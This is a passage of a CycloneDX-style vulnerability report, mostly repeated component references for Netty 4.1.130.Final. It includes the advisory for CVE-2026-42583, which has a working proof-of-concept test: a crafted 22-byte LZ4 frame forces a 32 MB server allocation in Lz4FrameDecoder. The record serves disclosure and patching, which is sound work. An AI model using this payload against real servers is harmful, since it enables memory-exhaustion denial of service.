          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-42583",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "description": "### Summary\nLz4FrameDecoder allocates a ByteBuf of size `decompressedLength` (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus `compressedLength` payload bytes - 22 bytes if `compressedLength == 1` - to force that allocation.\n\n### Details\nio.netty.handler.codec.compression.Lz4FrameDecoder#decode\nHeader fields are trusted for sizing. On the compressed path, after `readableBytes >= compressedLength`, the decoder does `ctx.alloc().buffer(decompressedLength, decompressedLength)` then decompresses.\n\n### PoC\nThe test below demonstrates how an attacker sending 22 bytes will force the server to allocate 32MB\n\n```java\n    @Test\n    void test() throws Exception {\n        EventLoopGroup workerGroup = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());\n        try {\n            AtomicReference<Throwable> serverError = new AtomicReference<>();\n            CountDownLatch latch = new CountDownLatch(1);\n\n            ServerBootstrap server = new ServerBootstrap()\n                    .group(workerGroup)\n                    .channel(NioServerSocketChannel.class)\n                    .childHandler(new ChannelInitializer<SocketChannel>() {\n                        @Override\n                        protected void initChannel(SocketChannel ch) {\n                            ch.pipeline()\n                                    .addLast(new Lz4FrameDecoder())\n                                    .addLast(new ChannelInboundHandlerAdapter() {\n                                        @Override\n                                        public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {\n                                            if (cause instanceof DecoderException) {\n                                                serverError.set(cause.getCause());\n                                            } else {\n                                                serverError.set(cause);\n                
                            }\n                                            latch.countDown();\n                                        }\n                                    });\n                        }\n                    });\n\n            ChannelFuture serverChannel = server.bind(0).sync();\n\n            Bootstrap client = new Bootstrap()\n                    .group(workerGroup)\n                    .channel(NioSocketChannel.class)\n                    .handler(new ChannelInboundHandlerAdapter() {\n                        @Override\n                        public void channelActive(ChannelHandlerContext ctx) {\n                            ByteBuf buf = ctx.alloc().buffer(22, 22);\n                            buf.writeLong(MAGIC_NUMBER);\n                            buf.writeByte(BLOCK_TYPE_COMPRESSED | 0x0F);\n                            buf.writeIntLE(1);\n                            buf.writeIntLE(1 << 25);\n                            buf.writeIntLE(0);\n                            buf.writeByte(0);\n\n                            ctx.writeAndFlush(buf);\n\n                            ctx.fireChannelActive();\n                        }\n                    });\n\n            ChannelFuture clientChannel = client.connect(serverChannel.channel().localAddress()).sync();\n\n            assertTrue(latch.await(10, TimeUnit.SECONDS));\n\n            assertInstanceOf(IndexOutOfBoundsException.class, serverError.get());\n\n            clientChannel.channel().close();\n            serverChannel.channel().close();\n        } finally {\n            workerGroup.shutdownGracefully();\n        }\n    }\n```\n\n### Impact\nUntrusted senders without per-channel / aggregate limits can stress memory with many small requests.",
      "recommendation": "Upgrade io.netty:netty-codec to version 4.1.133.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-42583"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-mj4r-2hfc-f8p6"
        }
      ],
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2102f4d1-7643-49ea-80b2-b42aeb178b3b"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2102f4d1-7643-49ea-80b2-b42aeb178b3b"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2102f4d1-7643-49ea-80b2-b42aeb178b3b"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2102f4d1-7643-49ea-80b2-b42aeb178b3b"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2102f4d1-7643-49ea-80b2-b42aeb178b3b"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2102f4d1-7643-49ea-80b2-b42aeb178b3b"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2102f4d1-7643-49ea-80b2-b42aeb178b3b"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#098d48d2-3ce6-4210-b5ce-dd5018f28a2a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#098d48d2-3ce6-4210-b5ce-dd5018f28a2a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#098d48d2-3ce6-4210-b5ce-dd5018f28a2a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#098d48d2-3ce6-4210-b5ce-dd5018f28a2a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#098d48d2-3ce6-4210-b5ce-dd5018f28a2a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#098d48d2-3ce6-4210-b5ce-dd5018f28a2a"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#098d48d2-3ce6-4210-b5ce-dd5018f28a2a"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#58bc0b88-775e-4ec9-a7b9-48bb19cc1a94"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#58bc0b88-775e-4ec9-a7b9-48bb19cc1a94"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#58bc0b88-775e-4ec9-a7b9-48bb19cc1a94"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#58bc0b88-775e-4ec9-a7b9-48bb19cc1a94"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#58bc0b88-775e-4ec9-a7b9-48bb19cc1a94"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#58bc0b88-775e-4ec9-a7b9-48bb19cc1a94"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#58bc0b88-775e-4ec9-a7b9-48bb19cc1a94"
        },
        {
